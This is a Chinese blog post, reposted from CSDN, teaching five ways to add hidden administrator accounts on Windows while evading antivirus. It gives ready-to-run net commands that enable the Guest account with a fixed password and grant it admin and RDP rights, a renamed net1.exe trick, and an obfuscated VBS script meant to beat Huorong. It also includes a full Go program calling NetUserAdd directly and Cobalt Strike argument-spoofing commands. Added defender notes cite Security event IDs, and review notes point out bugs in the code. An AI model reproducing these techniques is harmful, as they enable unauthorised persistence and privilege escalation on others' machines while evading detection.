

绕过杀软添加用户

方法0、直接运行神器

360shellcode.zip

github可搜

方法1、激活GUEST用户

比较好用,试过很多次杀软都不拦截

rem Enables the built-in Guest account, sets its password, and adds it to the
rem local Administrators and "Remote Desktop Users" groups.
rem Defender note: with account-management auditing enabled these steps are
rem typically logged as Security events 4722 (account enabled), 4724 (password
rem reset attempt) and 4732 (member added to a local group). An enabled Guest
rem account with group memberships is a high-signal finding on its own.
net   user  guest  /active:yes   
net   user  guest   Aa123456.
net   localgroup  administrators  guest   /add
net   localgroup "Remote  Desktop Users"  guest  /add

方法2、net1绕过

net1.exe在C:/windows/system32下

进入到目录下面,此时生成一个asd.txt

1de6516f4553171384cc8e5ace7be6c0.png

此时的asd.txt就和net 一样了,可以执行net user

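不会触发火绒告警(有的主机会告警,有的主机不会,原因不明)。需要注意:如果 asd.txt 只是 net1.exe 的副本,那么改变的只有文件名,文件哈希和版本信息中的 OriginalFileName 都不变,Sysmon 进程创建事件(ID 1)仍可据此识别。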

22c15886acae8582dc4ddf91432256ee.png

方法3、VBS API脚本

wscript.exe add.vbs 无法绕过火绒(会被当做adduser病毒干掉)

' Creates a local account through the ADSI WinNT provider and then modifies the
' local Administrators group. The surrounding text runs it with wscript.exe.
' Defender note: the account creation and the group change are recorded in the
' Security log (typically events 4720 and 4732 when account-management auditing
' is enabled) whether or not the script file itself is flagged.
' Read the local computer name to build the WinNT:// provider path.
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
' Bind to the computer object and to its Administrators group.
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
' Create the account object, set its password, and commit it with SetInfo.
Set od=ob.Create("user","iiice")
od.SetPassword "123456"
od.SetInfo
Set of=GetObject(os&"/iiice",user)
' Adds the path os & "/admin" to the Administrators group.
oe.add os&"/admin"

但是我们只要简单的尝试混淆即可绕过

' Same account-creation logic as the plain script. The ProgID string is built
' from concatenated fragments and the password is held in a constant.
' Defender note: the concatenation changes only the literal bytes that a static
' signature would match. The runtime behaviour is unchanged: wscript.exe
' instantiates WScript.Network, the ADSI WinNT provider creates the account, and
' the Administrators group gains a member. Detection should therefore key on
' that behaviour and on the resulting Security events (typically 4720 and 4732),
' not on the script text.
Set wsnetwork=CreateObject("WS"&"CR"&"IPT"&"."&"NET"&"WO"&"RK") 
os="WinNT://"&wsnetwork.ComputerName
' Bind to the computer object and to its Administrators group.
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
' Create the account object, set its password, and commit it with SetInfo.
Set od=ob.Create("user","iiice")
Const strPassword = "123456"
od.SetPassword strPassword
od.SetInfo
Set of=GetObject(os&"/iiice",user)
' Adds the path os & "/iiice" to the Administrators group.
oe.add os&"/iiice"

方法4、使用windows底层API

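原理是直接调用 Windows 自带 netapi32.dll 中的 NetUserAdd 等接口,不经过 net.exe/net1.exe 进程,从而避开杀软基于进程和命令行的监测。但账户创建和加入管理员组的操作本身仍会写入安全日志(开启账户管理审核时通常为 4720、4732 事件)。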

package main

import (
    "fmt"
    "os"
    "syscall"
    "unsafe"
)

// References:
//https://docs.microsoft.com/zh-cn/windows/win32/api/lmaccess/nf-lmaccess-netuseradd/
//https://github.com/CodyGuo/xcgui/blob/master/doc/cToGo.go
//https://github.com/iamacarpet/go-win64api/blob/master/users.go
//https://git.itch.ovh/itchio/ox/-/blob/ec75be15423d72ab9691a3318ecce3feee67b19b/syscallex/netapi32_windows.go
//https://pkg.go.dev/github.com/itchio/ox/syscallex#NetUserAdd

// USER_INFO_1 mirrors the Win32 USER_INFO_1 record described in the NetUserAdd
// reference above. NetUserAdd in this file passes a pointer to it with level 1.
// The struct is handed to the DLL by raw pointer, so the field order and field
// widths must stay exactly as declared.
type USER_INFO_1 struct {
    // String fields are pointers to UTF-16 text, produced in this file by UtfToStr.
    Usri1_name         *uint16
    Usri1_password     *uint16
    Usri1_password_age uint32 // can be ignored (original author's note)
    // Set from the USER_PRIV_* constants.
    Usri1_priv         uint32
    Usri1_home_dir     *uint16
    Usri1_comment      *uint16
    // Bitwise OR of the USER_UF_* constants.
    Usri1_flags        uint32
    Usri1_script_path  *uint16
}
// LOCALGROUP_MEMBERS_INFO_3 is the single-field record AddLocalGroup passes to
// NetLocalGroupAddMembers with level 3. The field points to a UTF-16 string
// that AddLocalGroup builds as hostname + `\` + user.
type LOCALGROUP_MEMBERS_INFO_3 struct {
    Lgrmi3_domainandname *uint16
}

// Values used for USER_INFO_1.Usri1_priv and Usri1_flags, plus the status code
// that both API wrappers in this file treat as success.
const (
    // Privilege levels for Usri1_priv. NetUserAdd in this file uses USER_PRIV_USER.
    USER_PRIV_GUEST            = 0
    USER_PRIV_USER             = 1
    USER_PRIV_ADMIN            = 2
    // Account flag bits for Usri1_flags. NetUserAdd ORs all three together.
    USER_UF_SCRIPT             = 1
    USER_UF_NORMAL_ACCOUNT     = 512
    USER_UF_DONT_EXPIRE_PASSWD = 65536
    //parmErr                     = 0
    // Return value compared against the result of each netapi32 call.
    NET_API_STATUS_NERR_Success = 0
)

// User holds the account name and plaintext password that main passes to
// NetUserAdd.
type User struct {
    username string
    password string
}

// main builds a hard-coded User, calls NetUserAdd with it, and prints the
// returned error (when non-nil) followed by the returned boolean.
//
// NOTE(review): NetUserAdd in this file returns a non-nil error on its success
// path as well, so the error Println fires in both outcomes. That success
// message contains the plaintext password, which therefore ends up on stdout.
func main() {
    // Change the username and password here.
    info := User{
        username: "test",
        password: "123456",
    }

    r, err := NetUserAdd(info.username, info.password)
    if err != nil {
        fmt.Println(err)
    }
    fmt.Println(r)
    // Disabled earlier variant: NetUserAdd now calls AddLocalGroup itself.
    //if r == true {
    //  _, err := AddLocalGroup("test", "Administrators")
    //  if err != nil {
    //      fmt.Println(err)
    //  }
    //}
}

// NetUserAdd creates a local account by calling the NetUserAdd export of
// netapi32.dll directly, then asks AddLocalGroup to put that account into the
// "Administrators" group.
//
// It returns false with an error when the API result is not
// NET_API_STATUS_NERR_Success. On success it returns true together with a
// non-nil error whose text carries the user name and plaintext password, so
// callers cannot use err != nil to detect failure. It panics if netapi32.dll
// cannot be loaded.
//
// Defender note: calling the API in-process avoids spawning net.exe or
// net1.exe, so command-line based rules see nothing. The account creation and
// the group change are still recorded by Windows (typically Security events
// 4720 and 4732 when account-management auditing is enabled).
func NetUserAdd(user string, pass string) (bool, error) {
    // Receives the index of the offending parameter from the API; never read here.
    var parmErr uint32
    parmErr = uint32(0)

    username := UtfToStr(user)
    password := UtfToStr(pass)
    userinfo := USER_INFO_1{
        Usri1_name:     username,
        Usri1_password: password,
        Usri1_priv:     USER_PRIV_USER,
        Usri1_flags:    USER_UF_SCRIPT | USER_UF_NORMAL_ACCOUNT | USER_UF_DONT_EXPIRE_PASSWD,
        //Usri1_home_dir:    UtfToStr(""),
        //Usri1_comment:     UtfToStr("test测试用户"),
        //Usri1_script_path: UtfToStr(""),
    }

    netapi, err := syscall.LoadLibrary("netapi32.dll")
    if err != nil {
        panic("dll引用失败")
    }
    // NOTE(review): the error returned by GetProcAddress is not checked before
    // the address is used.
    AddUser, err := syscall.GetProcAddress(netapi, "NetUserAdd")
    result, _, _ := syscall.Syscall6(AddUser,
        4,
        uintptr(0),         // server name (0 = local computer)
        uintptr(uint32(1)), // level 1, matching USER_INFO_1
        uintptr(unsafe.Pointer(&userinfo)),
        uintptr(unsafe.Pointer(&parmErr)), 0, 0,
    )
    // Original author's note: adding a user only works with administrator privileges.
    if result != NET_API_STATUS_NERR_Success {
        return false, fmt.Errorf("添加失败")
    } else {
        // A group-add failure is printed but does not change the return value.
        _, err = AddLocalGroup(user, "Administrators", netapi)
        if err != nil {
            fmt.Println(err)
        }
        return true, fmt.Errorf("添加成功%s:%s", user, pass)

    }

}

// AddLocalGroup adds hostname\user to the named local group by calling the
// NetLocalGroupAddMembers export from the already loaded netapi32.dll handle.
//
// It returns false with an error when the API result is not
// NET_API_STATUS_NERR_Success. On success it returns true with a non-nil error
// holding a fixed success message, so the error is non-nil in both outcomes.
//
// Defender note: a membership change made this way is still recorded by
// Windows (typically Security event 4732 when account-management auditing is
// enabled), even though no net.exe or net1.exe process is involved.
func AddLocalGroup(user, group string, netapi syscall.Handle) (bool, error) {
    // NOTE(review): the os.Hostname error is discarded. On failure the member
    // string would be built from an empty host name.
    work, _ := os.Hostname()
    WorkStation := UtfToStr(work + `\` + user)
    GroupName := UtfToStr(group)
    var uArray = make([]LOCALGROUP_MEMBERS_INFO_3, 1)
    uArray[0] = LOCALGROUP_MEMBERS_INFO_3{
        Lgrmi3_domainandname: WorkStation,
    }
    // NOTE(review): the error returned by GetProcAddress is discarded.
    ALG, _ := syscall.GetProcAddress(netapi, "NetLocalGroupAddMembers")
    result, _, _ := syscall.Syscall6(ALG, 5,
        uintptr(0),                          // servername
        uintptr(unsafe.Pointer(GroupName)),  // group name
        uintptr(uint32(3)),                  // level
        uintptr(unsafe.Pointer(&uArray[0])), // user array.
        uintptr(uint32(len(uArray))), 0)
    if result != NET_API_STATUS_NERR_Success {
        return false, fmt.Errorf("添加管理组失败")
    } else {
        return true, fmt.Errorf("添加管理组Administrators成功")
    }
}
// UtfToStr converts a Go string into a pointer to UTF-16 text using
// syscall.UTF16PtrFromString, for passing to the netapi32 calls in this file.
// It panics if the conversion returns an error.
func UtfToStr(str string) *uint16 {
    res, err := syscall.UTF16PtrFromString(str)
    if err != nil {
        panic(err)
    }
    return res
}

方法5、利用CS argue参数欺骗

beacon> argue net1 /bypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypass
beacon> run net1 user betasec 3had0w!@#123 /add 
beacon> run net1 localgroup administrators betasec /add

argue 进程参数欺骗:只改变进程创建时被记录的命令行(如 4688、Sysmon 事件 1 中的参数),实际执行的账户操作仍会产生 4720、4732 等安全日志事件。
argue [command] [fake arguments]
argue 命令 假参数 欺骗某个命令参数
argue [command]
argue 命令 取消欺骗某个命令参数

本文转载自: https://blog.csdn.net/weixin_63124284/article/details/127979977
版权归原作者 恸.283 所有, 如有侵权,请联系我们删除。
